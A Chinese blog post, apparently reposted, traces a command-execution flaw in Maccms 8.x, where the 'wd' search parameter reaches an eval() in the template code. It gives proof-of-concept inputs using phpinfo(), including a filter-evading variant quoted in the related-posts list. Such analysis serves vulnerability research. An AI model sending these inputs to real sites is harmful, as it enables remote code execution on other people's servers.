2. 程式人生 > >Maccms8.x 命令執行漏洞分析

Maccms8.x 命令執行漏洞分析

阿新 發佈:2017-08-19
mon 鏈接 文件 https 提交 index.php method if條件 xpl

下載鏈接https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db

首先打開Index.php

    $m = be(‘get‘,‘m‘);

m參數獲取經過第17行分割後

$par = explode(‘-‘,$m);

這裏填入?m=vod-search

經過34-39行處理

    $acs = array(‘vod‘,‘art‘,‘map‘,‘user‘,‘gbook‘,‘comment‘,‘label‘);
    
    if(in_array($ac,$acs)){
        $tpl->P["module"] = $ac
 
;
        include MAC_ROOT.‘/inc/module/‘.$ac.‘.php‘;
    }

這樣就包含了/inc/module/vod.php

elseif($method==‘search‘)
{
    $tpl->P["siteaid"] = 15;
    $wd = be("all", "wd");
    if(!empty($wd)){ $tpl->P["wd"] = $wd; }

然後獲取wd參數

之後在index.php第45行附近進入了

    $tpl->ifex();

跟蹤函數

剛上來

    function ifex()
    {    
        
 
if (!strpos(",".$this->H,"{if-")) { return; }
        $labelRule = buildregx(‘{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}‘,"is");

定義正則的規則 而$this-H在vod文件中說明了/inc/module/vod.php 189行附近

    $tpl->H = loadFile(MAC_ROOT_TEMPLATE."/vod_search.html");

回到/inc/common/template.php 866行

preg_match_all($labelRule
 
,$this->H,$iar);

其實就是匹配出提取出來的wd參數

接著進入循環

        for($m=0;$m<$arlen;$m++){
            $strn = $iar[1][$m];
            $strif= asp2phpif( $iar[2][$m] ) ;

接著往下走發現要實現eval

在916到921行限制是最少的

else{
//die("if($strif){\$ifFlag=true;}else{\$ifFlag=false;}");
   @eval("if($strif){\$ifFlag=true;}else{\$ifFlag=false;}");
   if ($ifFlag){ $this->H=str_replace($iar[0][$m],$strThen,$this->H);} else { $this->H=str_replace($iar[0][$m],"",$this->H); }
}

總結一下$this-H中必須有{if-我們輸入的wd參數帶有{if-就可以繞過

然後滿足

{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}

這樣提交

{if-A:phpinfo()}{endif-A}

進入preg_match_all中上面內容被扔進一個二維數組中

第874行的函數就是

        for($m=0;$m<$arlen;$m++){
            $strn = $iar[1][$m];
            $strif= asp2phpif( $iar[2][$m] ) ;  --874

phpinfo()

接著不滿足881行的if條件

if (strpos(",".$strThen,$labelRule2)>0){

進入了906行 而又不滿足908行的if

if (strpos(",".$strThen,$labelRule3)>0){

進入了最沒限制的916行

導致了命令執行

技術分享

Maccms8.x 命令執行漏洞分析

相關推薦

Maccms8.x 命令執行漏洞分析

mon 鏈接 文件 https 提交 index.php method if條件 xpl 下載鏈接https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db 首先打開Index.php $m = be(‘ge

Maccms8.x 命令執行分析

在很多地方看到有這個漏洞,自己學著分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}}

蘋果cms8.x 命令執行漏洞本地攻擊演示

新出道資訊保安愛好者,有很多需要學習的地方,願有一天能追上大佬步伐。 好了,下面進入正題,上半年6月份參加了鐵人三項賽,線下web題為Maccms8.x ,當時也是通過團隊協作以及百度資源成功破解伺服器,現在我搭建了靶機,具體步驟寫出來。 1.準備:phpstudy+Maccms8.x 原始

fastjson 1.2.24反序列化導致任意命令執行漏洞分析記錄

環境搭建: 漏洞影響版本: fastjson在1.2.24以及之前版本存在遠端程式碼執行高危安全漏洞 環境地址: https://github.com/vulhub/vulhub/tree/master/fastjson/vuln 正常訪問頁面返回hello,world~   此時抓包

WordPress <= 4.6 命令執行漏洞(PHPMailer)復現分析

inux 支持 rpo with rec program 遇到 other n) 漏洞信息 WordPress 是一種使用 PHP 語言開發的博客平臺,用戶可以在支持 PHP 和 MySQL 數據庫的服務器上架設屬於自己的網站。也可以把 WordPress 當作一個內容管理

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用(GetShell)(轉載)

ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦儘快更新到最新版本。 漏洞分析 Thin

漏洞預警 | ThinkPHP 5.x遠端命令執行漏洞

ThinkPHP採用面向物件的開發結構和MVC模式,融合了Struts的思想和TagLib(標籤庫)、RoR的ORM對映和ActiveRecord模式,是一款相容性高、部署簡單的輕量級國產PHP開發框架。 近日,ThinkPHP團隊釋出了版本更新資訊,修復一個遠端程式碼執行漏洞。該漏洞是由於框架對控制器名沒

ThinkPHP 5.x 遠端命令執行漏洞復現(GetShell)

注:轉載請註明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、簡介 ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒

PHPMailer 命令執行漏洞(CVE-2016-10033)分析

PHPMailer是一個基於PHP語言的郵件傳送元件,被廣泛運用於諸如WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等使用者量巨大的應用與框架中。 CVE-2016-10033是PHPMailer中存在的高危安全漏洞,攻擊者只

web命令執行漏洞

命令執行漏洞一,什麽是命令執行漏洞: 應用有時需要調用一些執行系統命令的函數,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,當用戶能控制這些函數中的參數時,就可以將惡意系統命令拼接到正常命令中,從而造成命令執行攻擊,這就是命令執行漏洞。二,利

Apache Tomcat CVE-2017-12615遠程代碼執行漏洞分析

文件 only html ive zip pre clas one 判斷 2017年9月19日, Apache Tomcat官方發布兩個嚴重的安全漏洞, 其中CVE-2017-12615為遠程代碼執行漏洞,通過put請求向服務器上傳惡意jsp文件, 再通過jsp文件在服

命令執行漏洞

linux -c log escape 二進制文件 內網滲透 open 網站 style 命令執行 應用有時需要調用一些執行系統命令的函數,如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen等,當用戶能控制這

1. 命令執行漏洞簡介

llc ima 命令註入 elastics 分享圖片 HR 服務 服務器 127.0.0.1 命令執行 應用有時需要調用一些執行系統命令的函數, 如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等, 當用

ghostscript 遠程命令執行漏洞復現

dict 依次 tro ict 影響 漏洞 命令執行漏洞 .com put 影響的版本 <= 9.23(全版本、全平臺) Ubuntu 開啟 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFE

python 代碼審計-命令執行漏洞(自己編寫的代碼)

[1] 問題 錯誤 code 端口掃描 iter turn command att python 代碼審計-命令執行漏洞(自己編寫的代碼) 0x00 源代碼 def execute(request): context ={} ip= request.POS

無線安全審計工具FruityWifi 多處命令執行漏洞

shanghai date Coding bit usr ofo 系統 errors new FruityWIfi是一款有名的無線安全審計的開源工具,其靈感來自於wifipineapple,目前該工具已經更新到2.4。它能夠讓用戶通過web界面來控制和管理模塊,十分方便。F

華碩路由器 Merlin.php 命令執行漏洞

定義 vpd lin 華碩 第一個 and popen函數 ffffff command Merlin.php 面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。 github鏈接:https://git

驗證php的遠端命令執行漏洞案例

比如驗證JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我們開啟php的環境,如phpStudy,wamp等等,這裡我們就使用phpStudy吧,進入php-5.5.38的目錄(當前使用的這個php版本

php程式碼審計命令執行漏洞

命令執行漏洞,使用者通過瀏覽器在遠端伺服器上執行任意系統命令,嚴格意義上,與程式碼執行漏洞還是有一定的區別。  常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

ThinkPHP 5.1.x SQL注入漏洞分析

一、背景引見 ThinkPHP 是一個疾速、複雜的基於 MVC 和麵向物件的輕量級 PHP 開發框架,遵照 Apache2 開源協議釋出。ThinkPHP從降生以來不斷秉承簡潔適用的設計準繩,在堅持出色的功能和至簡的程式碼的同時,也注重開發體驗和易用性,為 WEB 使用和 API 開發提供了強無